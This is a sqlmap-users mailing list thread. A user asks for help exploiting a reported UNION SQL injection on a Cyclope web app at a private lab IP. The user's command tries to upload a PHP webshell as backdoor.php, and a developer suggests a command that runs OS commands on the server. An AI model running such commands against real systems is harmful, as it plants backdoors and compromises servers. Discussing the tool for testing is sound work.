Re: [sqlmap-users] File Write Error
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] File Write Error
|
From: Miroslav S. <mir...@gm...> - 2014-03-21 18:11:59
|
There is always a 302 redirect, so I am not sure how ZAP detected this as a SQLi. Kind regards, Miroslav Stampar On Fri, Mar 21, 2014 at 3:19 PM, Brian Olson <br...@hu...> wrote: > Thanks for the quick response, Miroslav and Bernardo. It's very much > appreciated! There is a UNION technique that is being reported by ZAP, but > sqlmap isn't finding it and I haven't quite figured out how to simply tell > it what to use explicitly. ZAP detects a UNION vulnerability on > activate.php: > > > "act=auth-login&pag=login&username=ZAP%27+UNION+ALL+select+NULL+--+&password=ZAP" > > My attempts to input this have not been successful, so I'm not sure if > it's a false positive or I'm not using sqlmap quite right (more likely) . > > CMDLINE > sqlmap -u "http://172.16.71.138:7879/activate.php" > --data='act=auth-login&page=login&username=admin&password=admin' -p > "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write > /usr/share/webshells/php/simple-backdoor.php --file-dest > progra~1/cyclope/ni4zlja=/backdoor.php --prefix="'" --suffix="UNION ALL > select NULL --" > > As for the previous method, here's the attached file (on screen output was > massive - password is "password"). End result "[09:01:51] [CRITICAL] all > tested parameters appear to be not injectable. Also, you can try to rerun > by providing either a valid value for option '--string' (or '--regexp')" > > Thanks for the help! > > Brian > > > > On Fri, Mar 21, 2014 at 8:02 AM, Bernardo Damele A. G. < > ber...@gm...> wrote: > >> On 21 March 2014 11:57, Bernardo Damele A. G. <ber...@gm...> >> wrote: >> > [...] >> > All in all, can you please relaunch sqlmap (make sure you run git pull >> > first to sync to the GitHub repository) with the following syntax: >> >> Command line: >> >> python sqlmap.py -u "http://172.16.71.138:7879/index.php" >> --data="act=auth-login&pag=login&username=admin&password=admin" -p >> username --threads=10 --dbms=mysql --level=5 --risk=3 --os-cmd id -v 3 >> --parse-errors -t traffic.log --answers "language does the web server >> support=4,do you want to use for writable=2,comma separate list of >> absolute directory paths=C:/Progra~1/Cyclope/ni4zlja/,retrieve the=Y" >> >> Feel free to report back the result, the entire standard output of >> sqlmap and send me the traffic.log. >> >> Thank you. >> Bernardo >> > > > > ------------------------------------------------------------------------------ > Learn Graph Databases - Download FREE O'Reilly Book > "Graph Databases" is the definitive new guide to graph databases and their > applications. Written by three acclaimed leaders in the field, > this first edition is now available. Download your free book today! > http://p.sf.net/sfu/13534_NeoTech > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
